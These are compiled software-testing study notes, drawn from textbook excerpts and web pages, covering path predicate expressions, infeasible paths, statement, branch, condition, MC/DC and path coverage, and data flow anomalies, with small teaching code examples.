We show the path predicate expression of the path under consider-ation in Figure 4.13 for the sake of clarity. The rows of Figure 4.13 have beenobtained from Table 4.11 by combining each interpreted predicate in column 3 withits intended evaluation in column 1. Now the reader may compare Figures 4.11and 4.13 to note that the predicates in Figure 4.13 are interpretations of the corre-sponding predicates in Figure 4.11.

Example. We show in Figure 4.14 an infeasible path appearing in the CFG ofFigure 4.7. The path predicate and its interpretation are shown in Table 4.8, and thepath predicate expression is shown in Figure 4.15. The path predicate expression isunsolvable because the constraint 0 > 0 ≡ True is unsatisfiable. Therefore, the pathshown in Figure 4.14 is an infeasible path.

0 < AS ≡ True ........ (1)value[0] != -999 ≡ True ........ (2)value[0] >= MIN ≡ True ........ (3)value[0] <= MAX ≡ True ........ (4)

1 < AS ≡ False ........ (5)1 > 0 ≡ True ........ (6)

Figure 4.13 Path predicate expression for path in Figure 4.10.

1-2-3(T)-4(F)-10(T)-12-13.

Figure 4.14 Another example path from Figure 4.7.

TABLE 4.8 Interpretation of Path Predicate of Path in Figure 4.14.

Node Node Description Interpreted Description

1 Input vector:

< value[], AS, MIN, MAX >

2 i = 0, ti = 0,

tv = 0, sum = 0

3(T) ti < AS 0 < AS

4(F) value[i]! = − 999 value[0]! = − 999

10(T) tv > 0 0 > 0

12 av = (double)sum/tv av = (double)value[0]/0

13 return(av) return((double) value[0]/0)

Note: The bold entries in column 1 denote interpreted predicates.


0 < AS ≡ True ........ (1)value[0] != -999 ≡ True ........ (2)

0 > 0 ≡ True ........ (3)

Figure 4.15 Path predicate expression for path in Figure 4.14.

AS = 1MIN = 25MAX = 35

value[0] = 30

Figure 4.16 Input data satisfying constraints of Figure 4.13.

6. Generating Input Data from Path Predicate Expression: We must solvethe corresponding path predicate expression in order to generate input data whichcan force a program to execute a selected path. Let us consider the path predicateexpression shown in Figure 4.13. We observe that constraint 1 is always satisfied.Constraints 1 and 5 must be solved together to obtain AS = 1. Similarly, constraints2, 3, and 4 must be solved together. We note that MIN < = value[0] < = MAXand value[0]! = −999. Therefore, we have many choices to select values of MIN,MAX, and value[0]. An instance of the solutions of the constraints of Figure 4.13is shown in Figure 4.16.

4.7 EXAMPLES OF TEST DATA SELECTION

We give examples of selected test data to achieve complete statement and branchcoverage. We show four sets of test data in Table 4.9. The first two data sets coverall statements of the CFG in Figure 4.7. However, we need all four sets of testdata for complete branch coverage.

If we execute the method ReturnAverage shown in Figure 4.6 with the foursets of test input data shown in Figure 4.9, then each statement of the method isexecuted at least once, and every Boolean condition evaluates once to true and

TABLE 4.9 Test Data for Statement and Branch Coverage

Input Vector

Test Data Set AS MIN MAX value[]

1 1 5 20 [10]

2 1 5 20 [ − 999]

3 1 5 20 [4]

4 1 5 20 [25]

4.8 CONTAINING INFEASIBLE PATHS 107

once to false. We have thoroughly tested the method in the sense of completebranch coverage. However, it is possible to introduce simple faults in the methodwhich can go undetected when the method with the above four sets of test data isexecuted. Two examples of fault insertion are given below.

Example. We replace the correct statement

av = (double) sum/tv;

with a faulty statement

av = (double) sum/ti;

in the method. Here the fault is that the method computes the average of thetotal number of inputs, denoted by ti, rather than the total number of valid inputs,denoted by tv.

Example. We replace the correct statement

sum = sum + value[i];

with a faulty statement

sum = value[i];

in the method. Here the fault is that the method no more computes the sumof all the valid inputs in the array. In spite of the fault, the first set of test dataproduce the correct result due to coincidental correctness .

The above two examples of faults lead us to the following conclusions:

• One must generate test data to satisfy certain selection criteria, becausethose selection criteria identify the aspects of a program that we want tocover.

• Additional tests, which are much longer than the simple tests generated tomeet coverage criteria, must be generated after the coverage criteria havebeen met.

• Given a set of test data for a program, we can inject faults into the programwhich go undetected by those test cases.

4.8 CONTAINING INFEASIBLE PATHS

Woodward, Hedley, and Hennell [12] have identified some practical problems inapplying the idea of path testing. First, a CFG may contain a very large numberof paths; therefore, the immediate challenge is to decide which paths to select toderive test cases. Second, it may not be feasible to execute many of the selectedpaths. Thus, it is useful to apply a path selection strategy: First, select as manyshort paths as feasible; next choose longer paths to achieve better coverage ofstatements, branches, and predicates. A large number of infeasible paths in a CFGcomplicate the process of test selection. To simplify path-based unit testing, it is


useful to reduce the number of infeasible paths in a program unit through languagedesign, program design, and program transformation. Brown and Nelson [13] havedemonstrated the possibility of writing code with no infeasible paths.

Bertolino and Marre [14] have given an algorithm to generate a set of paths,to cover all the branchs of a CFG, to reduce the number of infeasible paths in thechosen set. Their algorithm is based on the idea of a reduced flow graph, called addgraph . The algorithm uses the concepts of dominance and implications amongthe arcs of a ddgraph.

Yates and Malevris [15] have suggested a strategy to reduce the numberof infeasible paths in a set of paths to achieve branch coverage. They suggestselecting a path cover, that is, a set of paths, whose constituent paths each involvea minimum number of predicates . On the contrary, if a path involves a large numberof predicates, it is less likely that all the predicates simultaneously hold, therebymaking the path infeasible. They have statistically demonstrated the efficacy of thestrategy.

McCabe’s [16] cyclomatic complexity measure (Table 3.3) gives an interest-ing graph-theoretic interpretation of a program flow graph. If we consider cyclo-matic complexity measures as paths in a flow graph, it is likely that a few infeasiblepaths will be constructed. The above discussion leads us to conclude that though theidea of statement coverage and branch coverage appear simple and straightforward,it is not easy to fully achieve those coverage criteria even for small programs.

4.9 SUMMARY

The notion of a path in a program unit is a fundamental concept. Assuming that aprogram unit is a function, a path is an executable sequence of instructions fromthe start of execution of the function to a return statement in the function. If thereis no branching condition in a program unit, then there is just one path in thefunction. Generally, there are many branching conditions in a program unit, andthus there are numerous paths. One path differs from another path by at leastone instruction. A path may contain one or more loops, but, ultimately, a path isexpected to terminate its execution. Therefore, a path is of finite length in termsof number of instructions it executes. One can have a graphical representation ofa program unit, called a control flow graph, to capture the concept of control flowin the program unit.

Each path corresponds to a distinct behavior of the program unit, and thereforewe need to test each path with at least one test case. If there are a large number ofpaths in a program, a programmer may not have enough time to test all the paths.Therefore, there is a need to select a few paths by using some path selection criteria.A path selection criterion allows us to select a few paths to achieve a certain kindof coverage of program units. Some well-known coverage metrics are statementcoverage, branch coverage, and predicate coverage. A certain number of paths arechosen from the CFG to achieve a desired degree of coverage of a program unit. Atan abstract level, each path is composed of a sequence of predicates and assignment(computation) statements. The predicates can be functions of local variables, global

LITERATURE REVIEW 109

variables, and constants, and those are called path predicates. All the predicatesalong the path must evaluate to true when control reaches the predicates for a pathto be executable. One must select inputs, called path forcing inputs, such that thepath predicates evaluate to true in order to be able to execute the path. The processof selecting path forcing inputs involves transforming the path predicates into aform that is void of local variables. Such a form of path predicates is called apath predicate expression. A path predicate expression is solely composed of theinput vector and possibly a vector of constants. One can generate values of theinput vector, which is considered as a test case, to exercise a path by solving thecorresponding path predicate expression. Tools are being designed for generatingtest inputs from program units.

If a program unit makes function calls, it is possible that the path predicatesare functions of the values returned by those functions. In such a case, it may bedifficult to solve a path predicate expression to generate test cases. Path testing ismore applicable to lower level program units than to upper level program unitscontaining many function calls.

Control flow graph : Reference 2

Coverages Test coverage measures the amount of testing performed by a set of test. Wherever we can count things and can tell whether or not each of those things has been tested by some test, then we can measure coverage and is known as test coverage.

The basic coverage measure is where the ‘coverage item’ is whatever we have been able to count and see whether a test has exercised or used this item.

There is danger in using a coverage measure. But, 100% coverage does not mean 100% tested. Coverage techniques measure only one dimension of a multi-dimensional concept. Two different test cases may achieve exactly the same coverage but the input data of one may find an error that the input data of the other doesn’t.

Benefit of code coverage measurement:

• It creates additional test cases to increase coverage • It helps in finding areas of a program not exercised by a set of test cases • It helps in determining a quantitative measure of code coverage, which indirectly

measure the quality of the application or product.

Drawback of code coverage measurement:

• One drawback of code coverage measurement is that it measures coverage of what has been written, i.e. the code itself; it cannot say anything about the software that has not been written.

• If a specified function has not been implemented or a function was omitted from the specification, then structure-based techniques cannot say anything about them it only looks at a structure which is already there.

The purpose of test coverage

Test coverage is an estimate utilized in software testing. It gives details about the level to which the written coding of an application has been tested.

It is a type of testing that seems straight and so appears in the caption of white box testing. Presently, the importance of test coverage is extensive in the ground of software engineering, the current plan method of which depends on computer languages. Test coverage methods are among the initial methods discovered for efficient software testing.

http://istqbexamcertification.com/wp-content/uploads/2012/01/test-coverage-formula.jpg

Basic coverage criteria

To measure how well the program is exercised by a test suite, one or more coverage criteria are used. There are a number of coverage criteria, the main ones being:

• Function coverage - Has each function in the program been executed? (Here every process or functions in the system has been recognized )

• Statement coverage - Has each line of the source code been executed? (Every statement in the system been executed.)

• Condition coverage - Has each evaluation point (such as a true/false decision) been executed?

• Path coverage - Has every possible route through a given part of the code been executed?

• Entry/exit coverage - Has every possible call and return of the function been executed?

• Branch coverage –Every division of every system configuration been executed?

Safety-critical applications are often required to demonstrate that testing achieves 100% of some form of code coverage. Some of the coverage criteria above are connected. For instance, path coverage implies condition, statement and entry/exit coverage. Statement coverage does not imply condition coverage, as the code (in the C programming language) below shows:

void foo(int bar) { printf("This is "); if (bar <= 0) { printf("not "); } printf("a positive integer.\n"); return; }

If the function foo were called with variable bar set to -1, statement coverage would be achieved. Condition coverage, however, would not.

Full path coverage, of the type described above, is usually impractical or impossible. Any module with a succession of n decisions in it can have up to 2n paths within it; loop constructs can result in an infinite number of paths. Many paths may also be infeasible, in that there is no input to the program under test that can cause that particular path to be executed. However, a general-purpose algorithm for identifying infeasible paths has been proven to be impossible (such an algorithm could be used to solve the halting problem). Techniques for practical path coverage testing instead attempt to identify classes of code paths that differ only in the number of loop executions, and to achieve "basis path" coverage the tester must cover all the path classes.

Advantage and disadvantage of test coverage

Advantage

• It builds extra test conditions to enhance exposure. • It assists in discovering location of a application not implemented by a group of

test conditions. • It assists influentially a significant calculation of test coverage, which ultimately

procedures the excellence of the software application.

Disadvantage

• One problem of test coverage capacity is that it calculates treatment of what has been written down, that is the code can’t declare anything regarding the application that has not been written down.

• If a particular method has not been executed or a method was deleted from the requirement, then configuration basis methods can’t declare anything about them it simply observes at a configuration which is previously present.

Test Coverage is an important indicator of software quality and an essential part of software maintenance. It helps in evaluating the effectiveness of testing by providing data on different coverage items. It is a useful tool for finding untested parts of a code base. Test coverage is also called code coverage in certain cases.

Test coverage can help in monitoring the quality of testing and assist in directing the test generators to create test cases that cover areas that have not been tested. It helps in determining a quantitative measure of Test coverage, which is an indirect measure of quality and identifies redundant test cases that do not increase coverage.

The output of coverage measurement can be used in several ways to improve the testing process:

• Traceability between the requirements and test cases can be established by measuring the Test Coverage

http://www.360logica.com/blog/2012/10/what-is-software-quality-assurance.html

• Change tracking, Impact analysis will be effective if we have proper Test mechanism in place

• Defect leakage will be prevented with proper Test Coverage • Gaps in requirements, test cases and defects at unit level can be found in an

easy way

Benefits of Test Coverage

• Defect prevention at early stages of project life cycle • It creates additional test cases to increase coverage • Better ROI will be achieved by reduction in UAT defects and production defects • It helps in finding areas of a program not exercised by a set of test cases • Time, Cost and Scope will be in control • Testing life will become smooth by managing the Risk based testing approach • It helps in determining a quantitative measure of code coverage, which indirectly

measures the quality of the application or product.

Test coverage tools

The Test Coverage tools are used to locate application functionality. One simply exercises the functionality of interest, and the test coverage tool indicates what part of the application code is executed. This is a very effective way to locate functionality in a large, poorly understood system. Coverage tools helps in checking that how thoroughly the testing has been done.

Features or characteristics of coverage measurement tools are as follows:

• To identify coverage items (instrumenting the code) • To calculate the percentage of coverage items that were tested by a set of tests • To report coverage items that have not been tested yet • To generate stubs and drivers (if part of a unit test framework)

It is very important to know that the coverage tools only measure the coverage of the items that they can identify. Just because your tests have achieved 100% statement coverage, this does not mean that your software is 100% tested!

Coverages: block, conditions, multiple conditions, MC/DC, path

statement coverage • The statement coverage is also known as line coverage or segment coverage. • The statement coverage covers only the true conditions. • Through statement coverage we can identify the statements executed and where

the code is not executed because of blockage. • In this process each and every line of code needs to be checked and executed

Advantage of statement coverage:

• It verifies what the written code is expected to do and not to do • It measures the quality of code written • It checks the flow of different paths in the program and it also ensure that

whether those path are tested or not.

Disadvantage of statement coverage:

• It cannot test the false conditions. • It does not report that whether the loop reaches its termination condition. • It does not understand the logical operators.

The statement coverage can be calculated as shown below:

To understand the statement coverage in a better way let us take an example which is basically a pseudo-code. It is not any specific programming language, but should be readable and understandable to you, even if you have not done any programming yourself.

Consider code sample 4.1 :

READ X READ Y

http://istqbexamcertification.com/wp-content/uploads/2012/01/statement-coverage-example.jpg

I F X>Y THEN Z = 0 ENDIF

Code sample 4.1

To achieve 100% statement coverage of this code segment just one test case is required, one which ensures that variable A contains a value that is greater than the value of variable Y, for example, X = 12 and Y = 10. Note that here we are doing structural test design first, since we are choosing our input values in order ensure statement coverage.

Now, let’s take another example where we will measure the coverage first. In order to simplify the example, we will regard each line as a statement. A statement may be on a single line, or it

may be spread over several lines. One line may contain more than one statement, just one statement, or only part of a statement. Some statements can contain other statements inside them. In code sample 4.2, we have two read statements, one

assignment statement, and then one IF statement on three lines, but the IF statement contains another statement (print) as part of it.

1 READ X 2 READ Y 3 Z =X + 2*Y 4 IF Z> 50 THEN 5 PRINT large Z 6 ENDIF

Code sample 4.2

Although it isn’t completely correct, we have numbered each line and will regard each line as a statement. Let’s analyze the coverage of a set of tests on our six-statement program:

TEST SET 1 Test 1_1: X= 2, Y = 3 Test 1_2: X =0, Y = 25 Test 1_3: X =47, Y = 1

Which statements have we covered?

• In Test 1_1, the value of Z will be 8, so we will cover the statements on lines 1 to 4 and line 6.

• In Test 1_2, the value of Z will be 50, so we will cover exactly the same statements as Test 1_1.

• In Test 1_3, the value of Z will be 49, so again we will cover the same statements.

Since we have covered five out of six statements, we have 83% statement coverage (with three tests). What test would we need in order to cover statement 5, the one statement that we haven’t exercised yet? How about this one:

Test 1_4: X = 20, Y = 25

This time the value of Z is 70, so we will print ‘Large Z’ and we will have exercised all six of the statements, so now statement coverage = 100%. Notice that we measured coverage first, and then designed a test to cover the statement that we had not yet covered.

Note that Test 1_4 on its own is more effective which helps in achieving 100% statement coverage, than the first three tests together. Just taking Test 1_4 on its own is also more efficient than the set of four tests, since it has used only one test instead of four. Being more effective and more efficient is the mark of a good test technique.

In this type of testing the code is executed in such a manner that every statement of the application is executed at least once. It helps in assuring that all the statements execute without any side effect. This method is also called as line coverage or segment coverage.

In statement coverage testing we make sure that all of our code blocks are executed. We can also identify which blocks are failed to execute in this method.

Still bugs may be there after executing all the blocks without any failure. Because it won't check with all the conditions in a single block. It's only a basic testing after the complete coding and dynamic analysis. For checking with every conditions we need to branch and path coverage testing.

There are several free tools available for conducting statement coverage testing.

block coverages A variant of Statement coverage is Block coverage, that provides the same measurement based on code blocks instead of statements. Since every code block have a known set of statements, there is a one-to-one relationship between statement coverage and block coverage from a test quality point of view.

a basic block is a sequence of consecutive statements that has exactly one entry point and one exit point.

The block coverage of T with respect to (P, R) is computed as Bc/(Be -Bi) , where Bc is the number of blocks covered, Bi is the number of unreachable blocks, and Be is the total number of blocks in the program, i.e. the size of the block coverage domain.

T is considered adequate with respect to the block coverage criterion if the statement coverage of T with respect to (P, R) is 1.

condition coverage

What is Condition Coverage Testing?

Condition coverage is also known as Predicate Coverage in which each one of the Boolean expression have been evaluated to both TRUE and FALSE.

Example

if ((A || B) && C) { << Few Statements >> } else { << Few Statements >> }

Result

In order to ensure complete Condition coverage criteria for the above example, A, B and C should be evaluated at least once against "true" and "false".

So, in our example, the 3 following tests would be sufficient for 100% Condition coverage testing. A = true | B = not eval | C = false A = false | B = true | C = true A = false | B = false | C = not eval

• This is closely related to decision coverage but has better sensitivity to the control flow.

• However, full condition coverage does not guarantee full decision coverage. • Condition coverage reports the true or false outcome of each condition. • Condition coverage measures the conditions independently of each other.

Other control-flow code-coverage measures include linear code sequence and jump (LCSAJ) coverage, multiple condition coverage (also known as condition combination coverage) and condition determination coverage (also known as multiple condition decision coverage or modified condition decision coverage, MCDC). This technique requires the coverage of all conditions that can affect or determine the decision outcome.

Condition coverage is also known as Predicate Coverage

Condition coverage is seen for Boolean expression, condition coverage ensures whether all the Boolean expressions have been evaluated to both TRUE and FALSE.

Let us take an example to explain Condition Coverage

IF (“X && Y”)

In order to suffice valid condition coverage for this pseudo-code following tests will be sufficient.

TEST 1: X=TRUE, Y=FALSE TEST 2: X=FALSE, Y=TRUE

Note: 100% condition coverage does not guarantee 100% decision coverage.

Example of Condition coverage

Simple example

Assume we want to test the following code extract:

if ( (A || B) && C ) { /* instructions */ } else { /* instructions */ }

where A, B and C represent atomic boolean expressions (i.e. not divisible in other boolean sub-expressions).

In order to ensure Condition coverage criteria for this example, A, B and C should be evaluated at least one time "true" and one time "false" during testes.

So, in our example, the 3 following testes would be sufficient to valid Condition coverage:

1. A = true / B = not eval / C = false 2. A = false / B = true / C = true 3. A = false / B = false / C = not eval

More complex example

Assume we replace the condition: ( (A || B) && C ) by: ( ((u == 0) || (x>5)) && ((y<6) or (z == 0)) )

A full Test Coverage would consist into building the following truth table and testing each combination:

On the other hand, to ensure Condition coverage, we should test (for example) just the 3 combinations here-before underlined in yellow.

When a boolean expression is evaluated it can be useful to ensure that all the terms in the expression are exercised. For example:

a if $x || $y;

To achieve full condition coverage, this expression should be evaluated with $x and $y set to each of the four combinations of values they can take.

Condition coverage gets complicated, and difficult to achieve, as the expression gets complicated. For this reason there are a number of different ways of reporting condition coverage which try to ensure that the most important combinations are covered without worrying about less important combinations.

Expressions which are not part of a branching construct should also be covered:

$z = $x || $y;

Condition coverage is also known as expression, condition-decision and multiple decision coverage.

multiple conditions coverage Multiple Condition Coverage is also known as Condition Combination Coverage.

In Multiple Condition Coverage for each decision all the combinations of conditions should be evaluated.

Let's take an example:

if (A||B) then print C

Here we have 2 Boolean expressions A and B, so the test set for Multiple Condition Coverage will be:

TEST CASE1: A=TRUE, B=TRUE TEST CASE2: A=TRUE, B=FALSE TEST CASE3: A=FALSE, B=TRUE TEST CASE4: A=FALSE, B=FALSE

As you can see that there are 4 test cases for 2 conditions. Similarly there will be 8 test cases for 3 conditions.

So you can say that if there are n conditions, there will be 2^n tests.

This criterion requires that all combinations of conditions inside each decision are tested. For example, the code fragment from the previous section will require eight tests:

• a=false, b=false, c=false • a=false, b=false, c=true • a=false, b=true, c=false • a=false, b=true, c=true • a=true, b=false, c=false • a=true, b=false, c=true • a=true, b=true, c=false • a=true, b=true, c=true

Advantage of Condition/Multiple Condition coverage. 1.It is very thorough testing and the bugs are normally found by this kind of testing.

Disadvantage 1.If the decision branch contain lots of sub-expressions or has very complex Boolean expressions , the tester will have to define a large number of test cases.

MC/DC

The modified condition/decision coverage (MC/DC) is a code coverage criterion that requires all of the below during testing:

1. Each entry and exit point is invoked 2. Each decision tries every possible outcome 3. Each condition in a decision takes on every possible outcome 4. Each condition in a decision is shown to independently affect the outcome of the

decision.

http://en.wikipedia.org/wiki/Code_coverage

Independence of a condition is shown by proving that only one condition changes at a time.

The Modified Condition/Decision Coverage enhances the condition/decision coverage criteria by requiring that each condition be shown to independently affect the outcome of the decision. This kind of testing is performed on mission critical application which might lead to death, injury or monetary loss.

Designing Modified Condition Coverage or Decision Coverage requires more thoughtful selection of test cases which is carried out on a standalone module or integrated components.

Characteristics of Modified Conditional Coverage:

• Every entry and exit point in the program has been invoked at least once. • Every decision has been tested for all the possible outcomes of the branch. • Every condition in a decision in the program has taken all possible outcomes at

least once. • Every condition in a decision has been shown to independently affect that

decision's outcome.

Multiple Condition Decision Coverage(MCDC) is also known as Modified Condition Decision Coverage.

In MCDC each condition should be evaluated at least once which affects the decision outcome independently.

Example for MCDC

if {(X or Y) and Z} then

To satisfy condition coverage, each Boolean expression X,Y and Z in above statement should be evaluated to TRUE and FALSE at least one time.

The TEST CASES for condition coverage will be:

TEST CASE1: X=TRUE, Y=TRUE, Z=TRUE TEST CASE2: X=FALSE, Y=FALSE, Z=FALSE

To satisfy the decision coverage we need to ensure that the IF statement evaluates to TRUE and FALSE at least once. So the test set will be:

TEST CASE1: X=TRUE, Y=TRUE, Z=TRUE TEST CASE2: X=FALSE, Y=FALSE, Z=FALSE

However for MCDC the above test cases are not sufficient because in MCDC each Boolean variable should be evaluated to TRUE and FALSE at least once and also affect the decision outcome.

So to ensure MCDC we need 4 more test cases.

TEST CASE3: X=FALSE, Y=FALSE, Z=TRUE TEST CASE4: X=FALSE, Y=TRUE, Z=TRUE TEST CASE5: X=FALSE, Y=TRUE, Z=FALSE TEST CASE6: X=TRUE, Y=FALSE, Z=TRUE

In test case 3 decision outcome is FALSE In test case 4 decision outcome is TRUE In test case 5 decision outcome is FALSE In test case 6 decision outcome is TRUE

So in the above test cases you can see that the change in the value of Boolean variables made a change in decision outcomes.

Combination of function coverage and branch coverage is sometimes also called decision coverage. This criterion requires that every point of entry and exit in the program have been invoked at least once, and every decision in the program have taken on all possible outcomes at least once. In this context the decision is a Boolean expression composed of conditions and zero or more Boolean operators. This definition is not the same as branch coverage, however, some do use the term decision coverage as a synonym for branch coverage.

Condition/decision coverage requires that both decision and condition coverage been satisfied. However, for safety-critical applications (e.g., for avionics software) it is often required that modified condition/decision coverage (MC/DC) be satisfied. This criterion extends condition/decision criteria with requirements that each condition should affect the decision outcome independently. For example, consider the following code:

if (a or b) and c then

http://en.wikipedia.org/wiki/Safety-critical

The condition/decision criteria will be satisfied by the following set of tests:

• a=true, b=true, c=true • a=false, b=false, c=false

However, the above tests set will not satisfy modified condition/decision coverage, since in the first test, the value of 'b' and in the second test the value of 'c' would not influence the output. So, the following test set is needed to satisfy MC/DC:

• a=false, b=false, c=true • a=true, b=false, c=true • a=false, b=true, c=true • a=false, b=true, c=false

path coverage

In this the test case is executed in such a way that every path is executed at least once. All possible control paths taken, including all loop paths taken zero, once, and multiple (ideally, maximum) items in path coverage technique, the test cases are prepared based on the logical complexity measure of a procedural design. In this type of testing every statement in the program is guaranteed to be executed at least one time. Flow Graph, Cyclomatic Complexity and Graph Metrics are used to arrive at basis path

Path coverage represents yet another interesting measure. Due to conditional statements like if-else, case in the design different path is created which diverts the flow of stimulus to the specific path.

Path coverage is considered to be more complete than branch coverage because it can detect the errors related to the sequence of operations. As mentioned in the above figure path will be decided according to the if-else statement According to the applied stimulus the condition which is satisfied only under those expressions will execute, the path will be diverted according to that. Path coverage is possible in always and function blocks . Path created by more than one block is not covered. Analysis of path coverage report is not so easy task. Path coverage report of the example: Path 1 : 15,20 Not Covered Path 2 : 15,21 Not Covered Path 3: 15,22 Not Covered Path 4: 17,20 Not Covered Path 5 : 17,21 Covered Path 6 : 17,22 Not Covered Total possible paths : 6 Total covered path : 1 Path coverage Percentage : 16.67 (1/6)

There are classes of errors which branch coverage cannot detect, such as:

$h = 0; if ($x) { $h = { a => 1 }; } if ($y) { print $h->{a}; }

100% branch coverage can be achieved by setting ($x, $y) to (1, 1) and then to (0, 0). But if we have (0, 1) then things go bang.

The purpose of path coverage is to ensure that all paths through the program are taken. In any reasonably sized program there will be an enormous number of paths through the program and so in practice the paths can be limited to those within a single subroutine, if the subroutine is not too big, or simply to two consecutive branches.

In the above example there are four paths which correspond to the truth table for $x and $y. To achieve 100% path coverage they must all be taken. Note that missing elses count as paths.

In some cases it may be impossible to achieve 100% path coverage:

a if $x; b; c if $x;

50% path coverage is the best you can get here. Ideally, the code coverage tool you are using will recognize this and not complain about it, but unfortunately we do not live in an ideal world. And anyway, solving this problem in the general case requires a solution to the halting problem, and I couldn't find a module on CPAN for that.

Loops also contribute to paths, and pose their own problems which I'll ignore for now.

100% path coverage implies 100% branch coverage.

Statement coverage .vs. Branch coverage .vs. Path coverage This post is for these who would like to prepare themselves for ISTQB exam and have difficulties with understanding the difference between various types of coverage. Let's consider following piece of a code: public int returnInput(int input, boolean condition1, boolean condition2, boolean condition3) {

int x = input; int y = 0; if (condition1) x++; if (condition2) x--; if (condition3) y=x; return y; } Statement coverage In order to execute every statement we need only one testcase which would set all conditions to true, every line of a code (statement) is touched. shouldReturnInput(x, true, true, true) - 100% statement covered But only half of branches are covered and only one path. Branch coverage You can visualize every "if-statment" as two branches (true-branch and false-branch). So it can clearly be seen that the above testcase follows only "true-branches" of every "if-statement". Only 50% of branches are covered. In order to cover 100% of branches we would need to add following testcase: shouldReturnInput(x, false, false, false) With these two testcases we have 100% statements covered, 100% branches covered Path coverage Nevertheless there is still a concept of path coverage. In order to understand path coverage it is good to visualize the above code in a form of a binary tree

As you probably see the above two testcases cover only two paths t-t-t and f-f-f while in fact there are 8 separate paths: 1-2-3 t -t -t - covered with testcase 1 t -t -f t -f -t t -f -f f -t -t f -t -f f -f -t f -f -f - covered with testcase 2

http://1.bp.blogspot.com/-ETEsyGN6VkQ/Ub4P9loi08I/AAAAAAAANlg/ateynj-eqso/s1600/CodeCoverage.bmp

Data flow graph

What is Data Flow Testing?

Data flow testing is a family of test strategies based on selecting paths through the program's control flow in order to explore sequences of events related to the status of variables or data objects. Dataflow Testing focuses on the points at which variables receive values and the points at which these values are used.

Advantages of Data Flow Testing:

Data Flow testing helps us to pinpoint any of the following issues:

• A variable that is declared but never used within the program. • A variable that is used but never declared. • A variable that is defined multiple times before it is used. • Deallocating a variable before it is used.

Meaning of Data Flow Data flow is an abstract representation of the sequence and possible changes of state of data objects, where the state of an object is any of creation (created); used: used or modified; destruction (killed). Data flow structure follows the trail of a data item as it is accessed and modified by the code. Using Data flow, one can understand how the data acts as they are transformed by the program and also, defects like referencing a variable with an undefined value and variables that are never used can be identified. Data Flow Testing Data flow testing strategies are family of test strategies to track program’s control flow in order to explore sequences of events related to status of data objects caused by creation, usage, modification or destruction with the intention of identifying any data anomalies.

Data flow testing is a technique used to detect improper use of data in a program. By looking data usage, risky areas of code can be found and more test cases can be applied. To test data flow we devise control flow graph. A data-flow graph (DFG) is a graph which represents data dependencies between a number of operations.

Data Flow Testing

5.1 GENERAL IDEA

A program unit, such as a function, accepts input values, performs computationswhile assigning new values to local and global variables, and, finally, producesoutput values. Therefore, one can imagine a kind of “flow” of data values betweenvariables along a path of program execution. A data value computed in a certainstep of program execution is expected to be used in a later step. For example, aprogram may open a file, thereby obtaining a value for a file pointer; in a later step,the file pointer is expected to be used. Intuitively, if the later use of the file pointeris never verified, then we do not know whether or not the earlier assignment ofvalue to the file pointer variable is all right. Sometimes, a variable may be definedtwice without a use of the variable in between. One may wonder why the firstdefinition of the variable is never used. There are two motivations for data flowtesting as follows. First, a memory location corresponding to a program variableis accessed in a desirable way. For example, a memory location may not be readbefore writing into the location. Second, it is desirable to verify the correctness ofa data value generated for a variable—this is performed by observing that all theuses of the value produce the desired results.

The above basic idea about data flow testing tells us that a programmer canperform a number of tests on data values, which are collectively known as data flowtesting. Data flow testing can be performed at two conceptual levels: static dataflow testing and dynamic data flow testing . As the name suggests, static data flowtesting is performed by analyzing the source code, and it does not involve actualexecution of source code. Static data flow testing is performed to reveal potentialdefects in programs. The potential program defects are commonly known as data


112

5.2 DATA FLOW ANOMALY 113

flow anomaly . On the other hand, dynamic data flow testing involves identifyingprogram paths from source code based on a class of data flow testing criteria .

The reader may note that there is much similarity between control flow test-ing and data flow testing. Moreover, there is a key difference between the twoapproaches. The similarities stem from the fact that both approaches identify pro-gram paths and emphasize on generating test cases from those program paths. Thedifference between the two lies in the fact that control flow test selection criteriaare used in the former, whereas data flow test selection criteria are used in thelatter approach.

In this chapter, first we study the concept of data flow anomaly as identifiedby Fosdick and Osterweil [1]. Next, we discuss dynamic data flow testing in detail.

5.2 DATA FLOW ANOMALY

An anomaly is a deviant or abnormal way of doing something. For example, itis an abnormal situation to successively assign two values to a variable withoutusing the first value. Similarly, it is abnormal to use a value of a variable beforeassigning a value to the variable. Another abnormal situation is to generate adata value and never use it. In the following, we explain three types of abnormalsituations concerning the generation and use of data values. The three abnormalsituations are called type 1, type 2, and type 3 anomalies [1]. These anomaliescould be manifestations of potential programming errors. We will explain whyprogram anomalies need not lead to program failures.

Defined and Then Defined Again (Type 1): Consider the partial sequence ofcomputations shown in Figure 5.1, where f1(y) and f2(z) denote functionswith the inputs y and z , respectively. We can interpret the two statementsin Figure 5.1 in several ways as follows:

• The computation performed by the first statement is redundant if thesecond statement performs the intended computation.

• The first statement has a fault. For example, the intended first compu-tation might be w = f1(y).

• The second statement has a fault. For example, the intended secondcomputation might be v = f2(z).

• A fourth kind of fault can be present in the given sequence in the form ofa missing statement between the two. For example, v = f3(x) may be thedesired statement that should go in between the two given statements.

:x = f1(y)x = f2(z):

Figure 5.1 Sequence of computations showing data flow anomaly.

114 CHAPTER 5 DATA FLOW TESTING

It is for the programmer to make the desired interpretation, though onecan interpret the given two statements in several ways, However, it can besaid that there is a data flow anomaly in those two statements, indicatingthat those need to be examined to eliminate any confusion in the mind ofa code reader.

Undefined but Referenced (Type 2): A second form of data flow anomaly isto use an undefined variable in a computation, such as x = x − y − w,where the variable w has not been initialized by the programmer. Here,too, one may argue that though w has not been initialized, the programmerintended to use another initialized variable, say y , in place of w. Whatevermay be the real intention of the programmer, there exists an anomaly inthe use of the variable w, and one must eliminate the anomaly either byinitializing w or replacing w with the intended variable.

Defined but Not Referenced (Type 3): A third kind of data flow anomaly is todefine a variable and then to undefine it without using it in any subsequentcomputation. For example, consider the statement x = f (x , y) in which anew value is assigned to the variable x . If the value of x is not used in anysubsequent computation, then we should be suspicious of the computationrepresented by x = f (x , y). Hence, this form of anomaly is called “definedbut not referenced.”

